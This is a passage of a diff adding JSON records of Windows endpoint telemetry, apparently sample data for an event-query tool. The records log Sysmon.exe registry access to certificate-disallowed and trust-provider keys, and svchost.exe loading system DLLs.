"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 3980, + "process_name": "svchost.exe", + 
"process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "esent.dll", + "image_path": "C:\\Windows\\System32\\esent.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": 
"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3980, + "process_name": "svchost.exe", + 
"process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 